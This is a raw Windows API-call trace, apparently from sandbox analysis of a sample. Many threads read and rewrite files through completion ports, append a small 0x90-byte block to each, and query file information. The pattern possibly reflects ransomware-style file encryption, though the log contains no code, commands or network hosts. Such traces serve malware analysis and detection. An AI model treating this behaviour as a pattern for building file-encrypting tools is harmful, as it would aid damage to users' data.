GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.659] ReadFile (in: hFile=0x19c, lpBuffer=0x3ef0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3ef0020 | out: lpBuffer=0x3ef0124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3ef0020) returned 1 [0168.660] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.660] WriteFile (in: hFile=0x1ec, lpBuffer=0x3830124, nNumberOfBytesToWrite=0x126dd, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3830020 | out: lpBuffer=0x3830124, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3830020) returned 0x0 [0168.665] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.665] WriteFile (in: hFile=0x1c8, lpBuffer=0x3b90124*, nNumberOfBytesToWrite=0x6b94, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3b90020) returned 1 [0168.689] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.689] WriteFile (in: hFile=0x19c, lpBuffer=0x3ef0124*, nNumberOfBytesToWrite=0x13591, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3ef0020 | out: lpBuffer=0x3ef0124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3ef0020) returned 1 [0168.704] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.708] WriteFile (in: hFile=0x1ec, lpBuffer=0x3830094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3830020 | out: lpBuffer=0x3830094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3830020) returned 1 [0168.713] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.713] WriteFile (in: hFile=0x1c8, lpBuffer=0x3b90094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3b90020 | out: lpBuffer=0x3b90094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3b90020) returned 1 [0168.745] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0168.753] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3ef0020) returned 1 [0168.753] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0168.753] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4010020) returned 1 [0168.753] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.753] CloseHandle (hObject=0x1a8) returned 1 [0168.783] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3710020) returned 1 [0168.786] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.786] CloseHandle (hObject=0x1c0) returned 1 [0168.805] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3a70020) returned 1 [0168.808] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.808] WriteFile (in: hFile=0x1a4, lpBuffer=0x4010094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x4010020 | out: lpBuffer=0x4010094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x4010020) returned 1 [0168.830] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.836] CloseHandle (hObject=0x19c) returned 1 [0168.859] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3ef0020) returned 1 [0168.862] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.957] ReadFile (in: hFile=0x1b0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 1 [0168.957] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.957] ReadFile (in: hFile=0x1a4, lpBuffer=0x3680124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3680020) returned 1 [0168.957] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.958] WriteFile (in: hFile=0x1b0, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x7c6e, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0168.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.958] WriteFile (in: hFile=0x1a4, lpBuffer=0x3680124*, nNumberOfBytesToWrite=0x16bd9, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3680020) returned 1 [0168.958] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.958] ReadFile (in: hFile=0x1b0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2690020) returned 0x0 [0168.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.959] ReadFile (in: hFile=0x1a4, lpBuffer=0x3680124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3680020) returned 0x0 [0168.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0168.959] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0168.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0168.959] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3680020) returned 1 [0168.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.959] WriteFile (in: hFile=0x1b0, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2690020) returned 1 [0168.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.959] WriteFile (in: hFile=0x1a4, lpBuffer=0x3680094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3680020 | out: lpBuffer=0x3680094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x3680020) returned 1 [0168.959] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.959] CloseHandle (hObject=0x1b0) returned 1 [0168.968] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0168.971] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0168.971] CloseHandle (hObject=0x1a4) returned 1 [0168.979] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3680020) returned 1 [0168.983] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 Thread: id = 126 os_tid = 0x5d8 [0160.781] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fec8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fec8, FileInformation=0x208e20) returned 0x0 Thread: id = 127 os_tid = 0x788 [0160.784] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fce8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fce8, FileInformation=0x208e20) returned 0xc000000d Thread: id = 128 os_tid = 0x69c [0160.786] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fcd0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fcd0, FileInformation=0x208e20) returned 0xc000000d Thread: id = 129 os_tid = 0x6a8 [0160.788] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fb38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fb38, FileInformation=0x208e20) returned 0xc000000d Thread: id = 130 os_tid = 0x500 [0160.790] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbe8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbe8, FileInformation=0x208e20) returned 0xc000000d Thread: id = 131 os_tid = 0x4e0 [0160.791] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf878, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf878, FileInformation=0x208e20) returned 0xc000000d Thread: id = 132 os_tid = 0x330 [0160.793] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fd70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fd70, FileInformation=0x208e20) returned 0xc000000d Thread: id = 133 os_tid = 0xa30 [0160.795] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fbd0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fbd0, FileInformation=0x208e20) returned 0xc000000d Thread: id = 134 os_tid = 0xb50 [0160.796] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd28, FileInformation=0x208e20) returned 0xc000000d Thread: id = 135 os_tid = 0xb70 [0160.798] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff950, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff950, FileInformation=0x208e20) returned 0x0 Thread: id = 136 os_tid = 0xb6c [0160.800] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f908, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f908, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 137 os_tid = 0xb74 [0160.802] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fe78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fe78, FileInformation=0x208e20) returned 0x0 Thread: id = 138 os_tid = 0xb68 [0160.804] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd20, FileInformation=0x208e20) returned 0x0 Thread: id = 139 os_tid = 0x758 [0160.806] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f798, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f798, FileInformation=0x208e20) returned 0x0 Thread: id = 140 os_tid = 0x3d4 [0160.811] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fef8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fef8, FileInformation=0x208e20) returned 0x0 Thread: id = 141 os_tid = 0x484 [0160.813] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fd00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fd00, FileInformation=0x208e20) returned 0x0 Thread: id = 142 os_tid = 0xb4c [0160.814] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe28, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 143 os_tid = 0xa1c [0160.822] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffec8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffec8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 144 os_tid = 0x2ac [0160.824] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8f0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8f0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 145 os_tid = 0xa8c [0160.826] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fa80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fa80, FileInformation=0x208e20) returned 0x0 Thread: id = 146 os_tid = 0x68c [0160.828] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb88, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 147 os_tid = 0x388 [0160.830] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f7e0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f7e0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 148 os_tid = 0xa50 [0160.832] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffea8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffea8, FileInformation=0x208e20) returned 0x0 Thread: id = 149 os_tid = 0x75c [0160.834] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fc30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fc30, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 150 os_tid = 0x240 [0160.836] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfca8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfca8, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 151 os_tid = 0x320 [0160.838] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fd58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fd58, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 152 os_tid = 0x3b4 [0160.840] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f908, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f908, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 153 os_tid = 0x760 [0160.845] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f980, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f980, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 154 os_tid = 0xb00 [0160.846] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361ff18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361ff18, FileInformation=0x208e20) returned 0x0 Thread: id = 155 os_tid = 0x7fc [0160.848] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa40, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 156 os_tid = 0xb18 [0160.850] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371ff60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371ff60, FileInformation=0x208e20) returned 0x0 Thread: id = 157 os_tid = 0xa68 [0160.852] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fe88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fe88, FileInformation=0x208e20) returned 0x0 Thread: id = 158 os_tid = 0x224 [0160.853] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb60, FileInformation=0x208e20) returned 0x0 Thread: id = 159 os_tid = 0x2c4 [0160.855] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f8a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f8a8, FileInformation=0x208e20) returned 0x0 Thread: id = 160 os_tid = 0x24c [0160.857] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359ff60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359ff60, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 161 os_tid = 0x4e8 [0160.859] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fce0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fce0, FileInformation=0x208e20) returned 0x0 Thread: id = 162 os_tid = 0x220 [0160.861] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369ff18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369ff18, FileInformation=0x208e20) returned 0x0 Thread: id = 163 os_tid = 0xb04 [0160.863] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fea8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fea8, FileInformation=0x208e20) returned 0x0 Thread: id = 164 os_tid = 0x180 [0160.866] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fbc0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fbc0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 165 os_tid = 0x53c [0160.867] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fdc0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fdc0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 166 os_tid = 0x5b4 [0160.869] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffda0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffda0, FileInformation=0x208e20) returned 0x0 Thread: id = 167 os_tid = 0x614 [0160.871] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fac8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fac8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 168 os_tid = 0x690 [0160.872] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffae0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffae0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 169 os_tid = 0x440 [0160.874] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfac0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfac0, FileInformation=0x208e20) returned 0x0 Thread: id = 170 os_tid = 0x7d8 [0160.876] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fdb8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fdb8, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 171 os_tid = 0xa60 [0160.878] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffd68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffd68, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 172 os_tid = 0xb24 [0160.880] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f988, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f988, FileInformation=0x208e20) returned 0x0 Thread: id = 173 os_tid = 0x878 [0160.882] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc20, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 174 os_tid = 0xb1c [0160.883] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f878, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f878, FileInformation=0x208e20) returned 0x0 Thread: id = 175 os_tid = 0xb08 [0160.885] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fea0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fea0, FileInformation=0x208e20) returned 0x0 Thread: id = 176 os_tid = 0x4fc [0160.887] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fcd0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fcd0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 177 os_tid = 0x4dc [0160.889] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffe18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffe18, FileInformation=0x208e20) returned 0x0 Thread: id = 178 os_tid = 0x43c [0160.891] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe30, FileInformation=0x208e20) returned 0x0 Thread: id = 179 os_tid = 0x1c4 [0160.893] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dff38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dff38, FileInformation=0x208e20) returned 0x0 Thread: id = 180 os_tid = 0xbec [0160.895] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f788, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f788, FileInformation=0x208e20) returned 0x0 Thread: id = 181 os_tid = 0xb48 [0160.897] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f828, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f828, FileInformation=0x208e20) returned 0x0 Thread: id = 182 os_tid = 0x5bc [0160.903] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe30, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 183 os_tid = 0x6b8 [0160.905] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fb60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fb60, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 184 os_tid = 0x2dc [0160.907] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9a0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9a0, 